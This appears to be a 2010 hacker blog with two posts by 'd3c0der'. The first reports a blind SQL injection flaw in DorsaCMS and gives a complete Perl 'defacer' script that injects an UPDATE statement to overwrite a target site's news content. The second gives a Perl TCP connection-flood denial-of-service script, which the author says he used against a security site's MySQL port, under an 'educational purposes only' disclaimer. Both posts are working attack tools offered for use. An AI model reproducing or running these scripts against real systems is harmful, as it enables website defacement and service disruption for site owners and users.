Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a cms that have certificate of security

u can see certificate of security from this link :
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

but  i found  a blind SQL Injection Vulnerability in this CMS 

http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

exploit code(tested on windows xp ) :


#!/usr/bin/perl
#d3c0der
system('color a');
system('cls');
system('title DorsaCMS Defacer');
print q{
===================================================
-= ** =-
DorsaCMS Defacer

[+] Coded by d3c0der   =>  d3c0der@hotmail.com

[+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
-= ** =-
===================================================


};

use HTTP::Request;
use LWP::UserAgent;



print "~# Target : ";
$site=<STDIN>;
chomp $site;
print "~# PageID : ";
$id=<STDIN>;
chomp $id;
 print "~# Deface Text : ";
$def=<STDIN>;
chomp $def;

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";

print "->hacking : $site\n";




@path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);


}

print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";




##
# By d3c0der
##


.

Posted by at No comments:

Thursday, December 2, 2010

simple d.o.s attacker

Hi,
I wrote a simple perl denial of service script 

I've got it working on windows xp with active perl
i used this script to attacking the my sql port of a security website , and here is the result ;)



please use this code FOR EDUCATIONAL PURPOSES  ONLY

#!/usr/bin/perl
#d3c0der
system('color a');
system('cls');
print q{
===================================================
-= ** =-
AttackerZ d.o.s Attacker - version 1.0

[+] coded by d3c0der   =>  d3c0der@hotmail.com

[+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
-= ** =-

===>  FOR EDUCATIONAL PURPOSES  ONLY <===

===================================================


};

use IO::Socket;

print "Host: ";{
chop ($host = <stdin>);
print "Port: ";
chop ($port = <stdin>);
print "SYN Requests to send : ";
chop ($num= <stdin>);
}
if(defined($ARGV[2])){
$host = $ARGV[0];
$port = $ARGV[1];
$num = $ARGV[2];
}
for ($i=0; $i<$num; $i++)
{
$len = length $form;
$sock = IO::Socket::INET->new (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "$! sorry ! Can't Connect";
syswrite STDOUT, "[+]SYN Request: $i\n";
}
$local_time = localtime();

$login = getlogin();
print " hello $login , your attack finish at $local_time\n";

print "All packets sent to $host\n";

 print "Press any key To exit...";
$end = <STDIN>;
chop ($end);
Posted by at No comments:
Subscribe to: Posts (Atom)